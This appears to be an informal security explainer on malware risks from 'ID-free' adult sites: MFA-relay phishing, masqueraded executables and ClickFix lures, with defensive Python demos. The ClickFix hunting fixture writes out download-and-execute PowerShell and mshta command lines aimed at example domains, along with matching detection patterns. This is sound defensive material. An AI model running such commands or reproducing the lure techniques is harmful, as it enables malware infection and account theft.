Can "adult" websites actually "infect" your computer?

Following a post about the recent UK laws requiring ID verification to view "adult" websites, I saw some posts claiming that malware (malicious software) is of little consequence to end users. I saw someone say something interesting.

Well, is Runix's statement true? The answer is both yes and no.

They're correct that it isn't 1999 anymore. "Drive-by" malware, i.e. getting infected simply by visiting a website, isn't really a thing anymore for an up-to-date browser, thanks to improvements in browser and operating system security. Furthermore, rootkits don't really exist in the modern cybersecurity ecosystem (a different conversation for a different time if you're curious). They're also correct that it is extremely unlikely a Threat Actor will burn a web-browser exploit on a home user: such exploits are rare and extremely valuable. Regardless, malware is very much still a threat to end users.

Following the statement from Runix25, user Glaukko made an interesting statement too.

Is Glaukko's assessment correct? Sort of; they're getting closer.

Let's back up first and look at some numbers. Currently vx-underground operates a "malware ingestion" system with which we collect malware from the internet. This malware typically targets home users. Sometimes we get lucky and get malware which is designed to target companies. If we're extremely lucky we get malware which is designed to target governments. Our malware ingestion system is extremely primitive: we ingest roughly 25,000 - 100,000 malware payloads a day. Large companies and organizations, such as Google's VirusTotal, ingest (on the conservative end) 200,000 - 1,000,000 malware payloads a day.

Malware is rampant. Malware is everywhere. This malware doesn't come from nowhere. It comes from online Threat Actors (cybercriminals) who are (usually) financially motivated, with some exceptions such as state-sponsored Threat Actors (malware written by governments to target people, organizations, or other governments).

Malware targeting people who are viewing adult content is going to come from financially motivated criminals. This malware will (probably) lack sophistication and will (probably) aim to steal sensitive data off your computer, such as saved browser passwords, session cookies and cryptocurrency wallets (infostealers such as Lumma Stealer or RedLine Stealer). This is important to note because understanding who the adversary is helps paint a picture of how they're (probably) going to operate.

All the methods described below are already rampant and usually follow trends. For example, when Ross Ulbricht was released from prison, there were multiple malware campaigns (operations by Threat Actors to target people) aimed at infecting people with malware. Likewise, we see malware campaigns which follow events around politicians, video games, movies, adult content, etc.

So how will they do it? Probably one of the following:

  1. Phishing

A Threat Actor will leave comments on social media, forums, blogs, etc. advertising a website which offers "ID-free adult content". The website will look like a legitimate adult content site. It will claim you can get the content by signing in with your e-mail or social media account, and it will ask you to do so. Social media sites and e-mail providers nowadays usually have MFA (2FA), so after you enter your credentials the fake site will relay the MFA prompt as well (it sits between you and the real login page, so the one-time code you type and the session cookie the real site issues both pass through the attacker's hands) to ensure they end up with a working, persistent session. Once this is done the fake adult website will "fail" or redirect to a different website. Following this, the Threat Actor will have access to your e-mail, social media, etc., which will then be used for:

  • Spam campaigns

  • Cryptocurrency scams

  • Pivot, use your e-mail to get access to other sensitive content

  • If you work from home, they'll try to pivot to your work documents

They'll probably also use something like EvilGinx to make their lives easier. EvilGinx, a legitimate red-team tool, is a reverse-proxy phishing framework that does exactly the operation I described: it relays the real login page to the victim and captures the credentials along with the session cookie issued after MFA. You can read about it here: https://abnormal.ai/blog/cybercriminals-evilginx-mfa-bypass
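To make the "MFA doesn't save you" point concrete, here is an added example (my own simulation, not code from the original post and not Evilginx itself). It models an in-memory identity provider with password plus TOTP, a relay proxy on a lookalike origin that forwards each step to the real site in real time, and the same victim signing in with a passkey. The origins, password, secrets and class names are all invented for the demo; the passkey is stood in for by an HMAC rather than a real public-key signature, but the property it illustrates is the real one: the browser signs the origin it is actually on, so a relayed assertion carries the phishing origin and the real site rejects it.

```python
import hashlib
import hmac
import secrets
import struct

# Constructed simulation: no network, no real accounts. Origins are invented.
REAL_ORIGIN = "https://login.example"          # the genuine site (assumed)
PHISH_ORIGIN = "https://login-example.click"   # attacker's lookalike (assumed)


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1, so the demo has a real time-based second factor."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


class IdentityProvider:
    """The real site: password + TOTP, or a passkey, then a bearer session cookie."""

    def __init__(self, origin, password, totp_secret, passkey_secret):
        self.origin = origin
        self.password = password
        self.totp_secret = totp_secret
        self.passkey_secret = passkey_secret   # stand-in for the passkey's public key
        self.sessions = set()

    def _issue(self):
        cookie = secrets.token_hex(16)
        self.sessions.add(cookie)
        return cookie

    def login_password_totp(self, password, code, now):
        if not (hmac.compare_digest(password, self.password) and code == totp(self.totp_secret, now)):
            return None
        return self._issue()

    def login_passkey(self, challenge, assertion):
        # A WebAuthn assertion is signed over the challenge *and* the origin the
        # browser showed the user; the server checks that origin before anything else.
        if assertion["origin"] != self.origin:
            return None
        msg = f"{challenge}|{assertion['origin']}".encode()
        expected = hmac.new(self.passkey_secret, msg, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, assertion["sig"]):
            return None
        return self._issue()

    def is_valid_session(self, cookie):
        return cookie in self.sessions


class RelayProxy:
    """Attacker-run lookalike site. Forwards every step to the real site as it
    happens and keeps whatever comes back; a TOTP code is relayed like anything else."""

    def __init__(self, real: IdentityProvider, origin):
        self.real = real
        self.origin = origin
        self.stolen = []

    def login_password_totp(self, password, code, now):
        cookie = self.real.login_password_totp(password, code, now)
        if cookie:
            self.stolen.append(cookie)
        return cookie

    def login_passkey(self, challenge, assertion):
        cookie = self.real.login_passkey(challenge, assertion)
        if cookie:
            self.stolen.append(cookie)
        return cookie


class Victim:
    def __init__(self, password, totp_secret, passkey_secret):
        self.password, self.totp_secret, self.passkey_secret = password, totp_secret, passkey_secret

    def sign_in_with_totp(self, site, now):
        return site.login_password_totp(self.password, totp(self.totp_secret, now), now)

    def sign_in_with_passkey(self, site, challenge):
        # The browser, not the user, fills in the origin of the page it is on.
        msg = f"{challenge}|{site.origin}".encode()
        assertion = {"origin": site.origin,
                     "sig": hmac.new(self.passkey_secret, msg, hashlib.sha256).hexdigest()}
        return site.login_passkey(challenge, assertion)


def run_demo():
    totp_secret, passkey_secret = b"demo-totp-secret", b"demo-passkey-secret"
    idp = IdentityProvider(REAL_ORIGIN, "hunter2", totp_secret, passkey_secret)
    proxy = RelayProxy(idp, PHISH_ORIGIN)
    victim = Victim("hunter2", totp_secret, passkey_secret)
    now = 1_700_000_000

    # 1) Password + TOTP typed into the proxy: login "works", and the proxy now
    #    holds a cookie the real site accepts.
    cookie = victim.sign_in_with_totp(proxy, now)
    totp_phished = cookie is not None and idp.is_valid_session(proxy.stolen[-1])

    # 2) Passkey through the proxy: the assertion names the phishing origin,
    #    the real site rejects it, and the proxy captures nothing usable.
    before = len(proxy.stolen)
    cookie2 = victim.sign_in_with_passkey(proxy, secrets.token_hex(8))
    passkey_phished = cookie2 is not None or len(proxy.stolen) != before

    # 3) Sanity check: the same passkey works fine on the real origin.
    works_directly = idp.is_valid_session(victim.sign_in_with_passkey(idp, secrets.token_hex(8)))
    return {"totp_phished": totp_phished, "passkey_phished": passkey_phished,
            "passkey_works_on_real_site": works_directly}


if __name__ == "__main__":
    print(run_demo())
```

The takeaway for the home-user case: a code you can read and retype can be relayed, so a one-time code does not stop this kind of phishing, while an origin-bound factor (passkey or hardware security key) does.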

  2. File Masquerading

You'll (probably) see files online which appear to be .exe files (Windows executables) or APK files (Android apps) claiming to be ID-bypass tools. They'll tell you to run the tool as administrator and to disable any security products on your machine. This sort of file masquerading and social engineering is extremely common with fake video game cheats and fake movie downloads.

Once the user downloads the malicious file, the instructions provided will make it "easy" to run the program. Upon execution the "tool" (malware) will check that security products are disabled; if they're not, it'll try to disable them itself. Subsequently, it'll download the actual malware, probably through a loader such as SmokeLoader.
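The one check that catches most of this masquerading is whether a file's content agrees with its name. Here is an added example of that check (my own code, not from the original post or any particular scanner): it looks at the leading bytes, the real extension versus the decoy one, and the right-to-left override trick. The sample files are constructed byte strings with invented names, not real malware.

```python
# Magic-byte signatures: (offset, signature, extensions that legitimately carry it).
MAGIC = [
    (0, b"MZ",           {"exe", "dll", "scr", "sys"}),
    (0, b"PK\x03\x04",   {"zip", "apk", "jar", "docx", "xlsx", "pptx"}),
    (0, b"%PDF",         {"pdf"}),
    (0, b"\x89PNG",      {"png"}),
    (0, b"\xff\xd8\xff", {"jpg", "jpeg"}),
    (4, b"ftyp",         {"mp4", "m4v", "mov"}),
]

# Extensions Windows or Android will execute or install when opened.
EXECUTABLE = {"exe", "dll", "scr", "sys", "apk", "jar", "msi", "bat", "cmd",
              "ps1", "js", "vbs", "hta", "lnk"}

# Extensions a victim expects from "content" or an innocent document.
DECOY = {"pdf", "mp4", "m4v", "mov", "jpg", "jpeg", "png", "gif", "docx", "txt"}


def sniff(data: bytes):
    """Return the extensions the leading bytes are consistent with, or None if unknown."""
    for off, sig, exts in MAGIC:
        if data[off:off + len(sig)] == sig:
            return exts
    return None


def inspect_download(name: str, data: bytes):
    """Return human-readable findings; an empty list means nothing looked off."""
    findings = []
    # U+202E (right-to-left override) reverses the rest of the name on screen,
    # so "ID_bypass\u202efdp.scr" is displayed as "ID_bypassrcs.pdf".
    if "\u202e" in name or "\u202d" in name:
        findings.append("Unicode bidi override in filename: the extension you see is not the real one")
    parts = name.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    if len(parts) > 2 and parts[-2] in DECOY and real_ext in EXECUTABLE:
        findings.append(f"double extension: shown as .{parts[-2]}, actually .{real_ext}")
    consistent = sniff(data)
    if consistent is not None and real_ext not in consistent:
        findings.append(f"content does not match extension: bytes say {sorted(consistent)}, "
                        f"name says .{real_ext or '(none)'}")
    if real_ext in EXECUTABLE or (consistent is not None and consistent & EXECUTABLE):
        findings.append("this is an executable or installable file, not media or a document")
    return findings


# Constructed samples (a few header bytes each), not real files.
SAMPLES = {
    "id_bypass.mp4":           b"MZ" + b"\x90" * 62,              # a PE renamed to look like video
    "IDBypass_v2.pdf.exe":     b"MZ" + b"\x90" * 62,              # classic double extension
    "ID_bypass\u202efdp.scr":  b"MZ" + b"\x90" * 62,              # RTLO: displays as ID_bypassrcs.pdf
    "age_verify_bypass.apk":   b"PK\x03\x04" + b"\x00" * 26,      # really an Android package
    "terms.pdf":               b"%PDF-1.7\n%\xe2\xe3\xcf\xd3",    # exactly what it says it is
}


def scan_all(samples=SAMPLES):
    return {name: inspect_download(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(repr(name), "->", findings or "ok")
```

Note that the APK is flagged only as "executable"; its content matches its name, which is the point: an "ID bypass" that asks you to install an app is still asking you to run someone else's code.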

  3. ClickFix (v1 or v2), FileFix

ClickFix (and its variants) is trendy right now. ClickFix is the name of a malicious technique used to trick people into downloading and executing malware themselves. It poses as a fake verification step: when you visit the website it tells you to prove you're a human (or an "adult") by following a simple guide on the screen. It has been hyper-effective at convincing people to execute malicious code. In essence, the page silently places a command on your clipboard (the copy/paste buffer behind the CTRL+C and CTRL+V shortcuts). Then the website instructs you to perform a few "harmless" steps to authenticate, typically open the Run dialog (Win+R), paste (CTRL+V) and press Enter, which runs that command and detonates the malware. FileFix is the same trick with the File Explorer address bar standing in for the Run dialog.
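Because the victim does the launching, ClickFix leaves a characteristic trace: an interpreter started directly under explorer.exe with a download-and-execute command line. The hunting heuristic below is an added example (my own, not from the original post and not a vendor rule). The process-creation events are constructed for the demo and the field names are my own rather than any particular log source's; the "padded comment" indicator for FileFix reflects the published description of that variant and is a heuristic, not a guarantee.

```python
import re

# Win+R (Run dialog) and the File Explorer address bar both spawn their child
# process under explorer.exe, which is what makes the pattern stand out.
LAUNCH_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "msiexec.exe", "curl.exe"}

INDICATORS = [
    (r"-(?:w|windowstyle)\s+h(?:idden)?\b", "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", "invoke-expression"),
    (r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|curl)\b", "remote fetch"),
    (r"https?://", "url on the command line"),
    (r"\bmshta\b", "mshta"),
    # FileFix-style padding: the real command, a long run of spaces, then a
    # '#' comment holding a fake file path so the address bar looks innocent.
    (r"\s{8,}#.*\\", "padded comment hiding a fake path"),
]


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if basename(ev["parent"]) not in LAUNCH_PARENTS or basename(ev["image"]) not in INTERPRETERS:
        return 0, reasons
    for pattern, why in INDICATORS:
        if re.search(pattern, ev["cmd"], re.IGNORECASE):
            reasons.append(why)
    return len(reasons), reasons


def hunt(events, threshold: int = 2):
    """Events scoring at or above the threshold, as (timestamp, user, score, reasons)."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["ts"], ev["user"], score, reasons))
    return hits


# Constructed events: invented hosts, users and domains.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ts": "2025-07-28T10:01:02", "user": "home\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": PS, "cmd": 'powershell -w hidden -c "iex (irm https://verify-human.example/c)"'},
    {"ts": "2025-07-28T10:04:40", "user": "home\\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://check-you-are-human.example/captcha.hta"},
    # Someone just opening a shell from the Run dialog: nothing to see.
    {"ts": "2025-07-28T11:15:00", "user": "home\\bob", "parent": r"C:\Windows\explorer.exe",
     "image": PS, "cmd": "powershell.exe"},
    # A download from an interactive cmd.exe session: wrong parent, not this pattern.
    {"ts": "2025-07-28T11:20:13", "user": "home\\bob", "parent": r"C:\Windows\System32\cmd.exe",
     "image": PS, "cmd": 'powershell -c "Invoke-WebRequest https://intranet.example/tool.zip -OutFile t.zip"'},
    # FileFix-style: command, then padding, then a fake path in a comment.
    {"ts": "2025-07-28T12:02:51", "user": "home\\carol", "parent": r"C:\Windows\explorer.exe",
     "image": PS, "cmd": r'powershell.exe -c "iex (irm https://secure-docs.example/p)"' + " " * 12
             + r"# C:\company\internal-secure\HRPolicy.docx"},
]


if __name__ == "__main__":
    for ts, user, score, reasons in hunt(EVENTS):
        print(ts, user, score, ", ".join(reasons))
```

The parent-process filter is what keeps the noise down: an admin fetching a file from a terminal has a different parent, while a user who pasted into Win+R or the Explorer address bar does not.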

Examples of ClickFix below:

That is how users will be tricked into executing malware. There will be some creativity in this stuff too. Like Glaukko said, we'll certainly see scam pop-ups and malicious pop-ups as well, and those pop-ups will do some of the things I've described above.

They're correct that users won't magically get malware. What will happen is that users become frustrated with having to identify themselves and go elsewhere for adult content, and these "alternatives" will be littered with traps to deliver malware payloads.

Thanks for coming to my Ted Talk
